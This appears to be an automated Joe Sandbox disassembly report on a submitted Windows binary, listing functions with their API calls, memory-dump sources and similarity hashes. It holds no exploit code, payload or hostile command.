Instruction Fuzzy Hash: 7EA10531614341AFC328DF20C885F2A7BE5AFA4318F54894CF4565B2E2DB71EDA6CB91

Function 001F61FE Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,001E82D9,001E82D9,?,?,?,001F644F,00000001,00000001,8BE85006), ref: 001F6258
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,001F644F,00000001,00000001,8BE85006,?,?,?), ref: 001F62DE
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 001F63D8
__freea.LIBCMT ref: 001F63E5

Part of subcall function 001F3820: RtlAllocateHeap.NTDLL(00000000,?,00291444,?,001DFDF5,?,?,001CA976,00000010,00291440,001C13FC,?,001C13C6,?,001C1129), ref: 001F3852

__freea.LIBCMT ref: 001F63EE
__freea.LIBCMT ref: 001F6413

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: dff55019816c488b3833d740fc7fa8090a0d7f86c07e4b317f8ebfb3884353d8
Instruction ID: e150cab81f9f428c0ec117e554822f24d1603b79edd7fd4f4d66b0cd2d7541df
Opcode Fuzzy Hash: dff55019816c488b3833d740fc7fa8090a0d7f86c07e4b317f8ebfb3884353d8
Instruction Fuzzy Hash: ED51F172A0021AAFEB258F64DC81EBF77AAEF55750F254229FE09D7140EB34DC44C6A0

Function 0024BBDB Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON

Download Yara Rule

APIs

Part of subcall function 001C9CB3: _wcslen.LIBCMT ref: 001C9CBD

Part of subcall function 0024C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0024B6AE,?,?), ref: 0024C9B5
Part of subcall function 0024C998: _wcslen.LIBCMT ref: 0024C9F1
Part of subcall function 0024C998: _wcslen.LIBCMT ref: 0024CA68
Part of subcall function 0024C998: _wcslen.LIBCMT ref: 0024CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0024BCCA
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0024BD25
RegCloseKey.ADVAPI32(00000000), ref: 0024BD6A
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0024BD99
RegCloseKey.ADVAPI32(?,?,00000000), ref: 0024BDF3
RegCloseKey.ADVAPI32(?), ref: 0024BDFF

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
String ID:
API String ID: 1120388591-0
Opcode ID: 6115ba24e54eaa0b739e205163f28b959b6444d48da9faff6229e4c13f571681
Instruction ID: 72e33974151dc9c2ba9498a851e4fb4f25cc972c6dfab272d87ca07082dc9454
Opcode Fuzzy Hash: 6115ba24e54eaa0b739e205163f28b959b6444d48da9faff6229e4c13f571681
Instruction Fuzzy Hash: D0818C30218241EFC719DF24C885E2ABBE5FF94308F14899DF4598B2A2DB31ED55CB92

Function 0021F7AD Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000035), ref: 0021F7B9
SysAllocString.OLEAUT32(00000001), ref: 0021F860
VariantCopy.OLEAUT32(0021FA64,00000000), ref: 0021F889
VariantClear.OLEAUT32(0021FA64), ref: 0021F8AD
VariantCopy.OLEAUT32(0021FA64,00000000), ref: 0021F8B1
VariantClear.OLEAUT32(?), ref: 0021F8BB

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Variant$ClearCopy$AllocInitString
String ID:
API String ID: 3859894641-0
Opcode ID: f726df951fc84367f8c4fcef5170b4011599465a889e6eb17351f758c59bd062
Instruction ID: a2714b738a7a729bbbe111561d1868ad20df8d27dea7f79d7257c7d9954c0776
Opcode Fuzzy Hash: f726df951fc84367f8c4fcef5170b4011599465a889e6eb17351f758c59bd062
Instruction Fuzzy Hash: 8251E731520310BACF50BF65D995BA9B3E4EF75310F24846BE816DF291DBB08C90CB96

Function 0023910C Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON

Download Yara Rule

APIs

Part of subcall function 001C7620: _wcslen.LIBCMT ref: 001C7625

Part of subcall function 001C6B57: _wcslen.LIBCMT ref: 001C6B6A

GetOpenFileNameW.COMDLG32(00000058), ref: 002394E5
_wcslen.LIBCMT ref: 00239506
_wcslen.LIBCMT ref: 0023952D
GetSaveFileNameW.COMDLG32(00000058), ref: 00239585

Strings

X, xrefs: 00239412

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: _wcslen$FileName$OpenSave
String ID: X
API String ID: 83654149-3081909835
Opcode ID: 50a045b486f92149fb4522142dfd7d21d38b19230e9dcae525ef3ff2c8654f90
Instruction ID: 43af9a45a672991b2ab78464bd811ce5ee1b73bd7986a212f41508948e06c801
Opcode Fuzzy Hash: 50a045b486f92149fb4522142dfd7d21d38b19230e9dcae525ef3ff2c8654f90
Instruction Fuzzy Hash: 56E1C0716183418FC714DF24C881F6AB7E4BFA5314F04896DF8899B2A2DB70DD55CB92

Function 001D920C Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 001D9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 001D9BB2

BeginPaint.USER32(?,?,?), ref: 001D9241
GetWindowRect.USER32(?,?), ref: 001D92A5
ScreenToClient.USER32(?,?), ref: 001D92C2
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 001D92D3
EndPaint.USER32(?,?,?,?,?), ref: 001D9321
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 002171EA

Part of subcall function 001D9339: BeginPath.GDI32(00000000), ref: 001D9357

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
String ID:
API String ID: 3050599898-0
Opcode ID: 3cfef7195d3780d5b612679a4183968a3aeaa56be54da3a632278a816d5e4cec
Instruction ID: e1775a77ee4133fc0d1f4be93aff6bf35d068ae571b1e0b0dc6a73be369f979b
Opcode Fuzzy Hash: 3cfef7195d3780d5b612679a4183968a3aeaa56be54da3a632278a816d5e4cec
Instruction Fuzzy Hash: BC41BE70104301AFE711DF25DC88FBA7BF8EF95721F14062AF9A8972A1C7319855DB61

Function 002307EF Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 0023080C
ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00230847
EnterCriticalSection.KERNEL32(?), ref: 00230863
LeaveCriticalSection.KERNEL32(?), ref: 002308DC
ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 002308F3
InterlockedExchange.KERNEL32(?,000001F6), ref: 00230921

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
String ID:
API String ID: 3368777196-0
Opcode ID: f1afd5cde1fe8729615ea774f477f827fdb7768aa7d98f190d015980c21425ec
Instruction ID: cf79bbedaead1acf09f89e2d2d6133fea0c6beef2c7de58ee745e7fc141dbc8a
Opcode Fuzzy Hash: f1afd5cde1fe8729615ea774f477f827fdb7768aa7d98f190d015980c21425ec
Instruction Fuzzy Hash: BA418971900205EFDF04AF54DC85AAAB7B9FF04700F1040A9ED049A297DB30DE61DBA4

Function 002581DB Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0021F3AB,00000000,?,?,00000000,?,0021682C,00000004,00000000,00000000), ref: 0025824C
EnableWindow.USER32(00000000,00000000), ref: 00258272
ShowWindow.USER32(FFFFFFFF,00000000), ref: 002582D1
ShowWindow.USER32(00000000,00000004), ref: 002582E5
EnableWindow.USER32(00000000,00000001), ref: 0025830B
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0025832F

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: c46374772a83e501548dc5debf6839922758f51b4209492e9de4d5eb2486e8b8
Instruction ID: b148e975f8344eb9cbfac3a0ff183975f9b3cf59e43ac20a8728b89bf951b57c
Opcode Fuzzy Hash: c46374772a83e501548dc5debf6839922758f51b4209492e9de4d5eb2486e8b8
Instruction Fuzzy Hash: DF41D630601742AFDF16CF15D899BE47BE0FB09716F1841A9ED089B262CB71A869CF48

Function 00224C7D Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00224C95
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00224CB2
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00224CEA
_wcslen.LIBCMT ref: 00224D08
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00224D10
_wcsstr.LIBVCRUNTIME ref: 00224D1A

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
String ID:
API String ID: 72514467-0
Opcode ID: aa2368bf72032037c7738046c745306d81431e8241d432961922c029d8f94fd2
Instruction ID: 2739fed3cdd2fe3a6476bcd83e398231e9b51471bf3448bff806529e71175456
Opcode Fuzzy Hash: aa2368bf72032037c7738046c745306d81431e8241d432961922c029d8f94fd2
Instruction Fuzzy Hash: 4A21D7312142217BEB196F79BC49E7B7B9CDF55750F10402AF805CA192EBB1DD1196A0

Function 0023581E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON

Download Yara Rule

APIs

Part of subcall function 001C3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,001C3A97,?,?,001C2E7F,?,?,?,00000000), ref: 001C3AC2

_wcslen.LIBCMT ref: 0023587B
CoInitialize.OLE32(00000000), ref: 00235995
CoCreateInstance.OLE32(0025FCF8,00000000,00000001,0025FB68,?), ref: 002359AE
CoUninitialize.OLE32 ref: 002359CC

Strings

.lnk, xrefs: 00235876, 002358C1, 00235985

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
String ID: .lnk
API String ID: 3172280962-24824748
Opcode ID: 3f7f80b63b022e6fcfa42c11f862db335ed24647fbcf890e86e1009c7247e3f8
Instruction ID: 96d1bf4af2451f84c6a64173024ab2ab82e1cd127ef2c087b46d66da97b0527d
Opcode Fuzzy Hash: 3f7f80b63b022e6fcfa42c11f862db335ed24647fbcf890e86e1009c7247e3f8
Instruction Fuzzy Hash: D1D161B06187129FC714DF24C484A2ABBE2FF99714F14885DF88A9B361DB31ED45CB92

Function 0022175D Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00220FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00220FCA
Part of subcall function 00220FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00220FD6
Part of subcall function 00220FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00220FE5
Part of subcall function 00220FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00220FEC
Part of subcall function 00220FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00221002

GetLengthSid.ADVAPI32(?,00000000,00221335), ref: 002217AE
GetProcessHeap.KERNEL32(00000008,00000000), ref: 002217BA
HeapAlloc.KERNEL32(00000000), ref: 002217C1
CopySid.ADVAPI32(00000000,00000000,?), ref: 002217DA
GetProcessHeap.KERNEL32(00000000,00000000,00221335), ref: 002217EE
HeapFree.KERNEL32(00000000), ref: 002217F5

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: a0b48642c874e72e390beea94194a4c8c65ce02e33c019ccdb6daf89b89a2b46
Instruction ID: 201a981b12683b8aa02e29a002d1968fc8626cdaeafbd05ef6e838cb01bb48ad
Opcode Fuzzy Hash: a0b48642c874e72e390beea94194a4c8c65ce02e33c019ccdb6daf89b89a2b46
Instruction Fuzzy Hash: EC11EE31520716FFDB208FE4EC48FAFBBA8EB95316F208028F4419B211D735A920CB60

Function 002214CE Relevance: 9.1, APIs: 6, Instructions: 64processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 002214FF
OpenProcessToken.ADVAPI32(00000000), ref: 00221506
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00221515
CloseHandle.KERNEL32(00000004), ref: 00221520
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0022154F
DestroyEnvironmentBlock.USERENV(00000000), ref: 00221563

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: ca0698e8e1e03f85b5627c0206f68a8e0530c2810f1d36dd65962b36d870751f
Instruction ID: 074a2f17b2c622eaf16458ec69e7079cc654d129002d95cdfe0449deb50655f3
Opcode Fuzzy Hash: ca0698e8e1e03f85b5627c0206f68a8e0530c2810f1d36dd65962b36d870751f
Instruction Fuzzy Hash: 1E11447250020EBFDB119FA8ED49FDA7BA9EB48705F144064FA05A20A0D3718E70DB60

Function 001E3382 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,001E3379,001E2FE5), ref: 001E3390
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 001E339E
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 001E33B7
SetLastError.KERNEL32(00000000,?,001E3379,001E2FE5), ref: 001E3409

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: ffccfd61aa4c35a2d6ad442a96587b50728b0a5f95aa1356c81b6ee97d8b6c4c
Instruction ID: c2deb3c7740cbb7a0712f7ff3ef75d274f238137639f468569ad9a516f8f03ef
Opcode Fuzzy Hash: ffccfd61aa4c35a2d6ad442a96587b50728b0a5f95aa1356c81b6ee97d8b6c4c
Instruction Fuzzy Hash: 3801243220AB51BFA72A27777C8D97E2A94EB293B97300229F430831F0EF614E015664

Function 001F2D74 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,001F5686,00203CD6,?,00000000,?,001F5B6A,?,?,?,?,?,001EE6D1,?,00288A48), ref: 001F2D78
_free.LIBCMT ref: 001F2DAB
_free.LIBCMT ref: 001F2DD3
SetLastError.KERNEL32(00000000,?,?,?,?,001EE6D1,?,00288A48,00000010,001C4F4A,?,?,00000000,00203CD6), ref: 001F2DE0
SetLastError.KERNEL32(00000000,?,?,?,?,001EE6D1,?,00288A48,00000010,001C4F4A,?,?,00000000,00203CD6), ref: 001F2DEC
_abort.LIBCMT ref: 001F2DF2

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 1ec85ea7f4ef90c5f6ad64911f7b1878d96af89f6f9ec5f9d065c90493f6fc06
Instruction ID: f4f78b2a2215b0372754b7c0cba780845e9d68d04166868554e4238431924010
Opcode Fuzzy Hash: 1ec85ea7f4ef90c5f6ad64911f7b1878d96af89f6f9ec5f9d065c90493f6fc06
Instruction Fuzzy Hash: EBF0A435545B1D3BC61227B4BC1EA3A2559BFD27A1B350519FB28932A2EF3489015260

Function 00258A24 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 001D9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 001D9693
Part of subcall function 001D9639: SelectObject.GDI32(?,00000000), ref: 001D96A2
Part of subcall function 001D9639: BeginPath.GDI32(?), ref: 001D96B9
Part of subcall function 001D9639: SelectObject.GDI32(?,00000000), ref: 001D96E2

MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00258A4E
LineTo.GDI32(?,00000003,00000000), ref: 00258A62
MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00258A70
LineTo.GDI32(?,00000000,00000003), ref: 00258A80
EndPath.GDI32(?), ref: 00258A90
StrokePath.GDI32(?), ref: 00258AA0

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: 36e20151af2eeb47a318a7312533db675ca9d796620ebf6edc67a6b6cb994b79
Instruction ID: d6439a770d35ed2fc044b321f3ca3caf07162d9fb24c8997253009e331ae7b75
Opcode Fuzzy Hash: 36e20151af2eeb47a318a7312533db675ca9d796620ebf6edc67a6b6cb994b79
Instruction Fuzzy Hash: 3E111E7600024DFFEF119F90EC88EAA7F6CEB04351F148012BA19951A1D7719D55DF64

Function 002251FD Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00225218
GetDeviceCaps.GDI32(00000000,00000058), ref: 00225229
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00225230
ReleaseDC.USER32(00000000,00000000), ref: 00225238
MulDiv.KERNEL32(000009EC,?,00000000), ref: 0022524F
MulDiv.KERNEL32(000009EC,00000001,?), ref: 00225261

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 08d1e33b19d59f46a120b7a370792ae5f104af2f6ed8371435ad7e1ad39e206e
Instruction ID: c39481478e31f547c0d0afeab74c19388952225f9301e456287d9df46e755b30
Opcode Fuzzy Hash: 08d1e33b19d59f46a120b7a370792ae5f104af2f6ed8371435ad7e1ad39e206e
Instruction Fuzzy Hash: 22014F75A00719BFEB109FE5AC49A5EBFB8EB48752F148065FA04A7281E6709D10CFA4

Function 001C1BC3 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 001C1BF4
MapVirtualKeyW.USER32(00000010,00000000), ref: 001C1BFC
MapVirtualKeyW.USER32(000000A0,00000000), ref: 001C1C07
MapVirtualKeyW.USER32(000000A1,00000000), ref: 001C1C12
MapVirtualKeyW.USER32(00000011,00000000), ref: 001C1C1A
MapVirtualKeyW.USER32(00000012,00000000), ref: 001C1C22

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
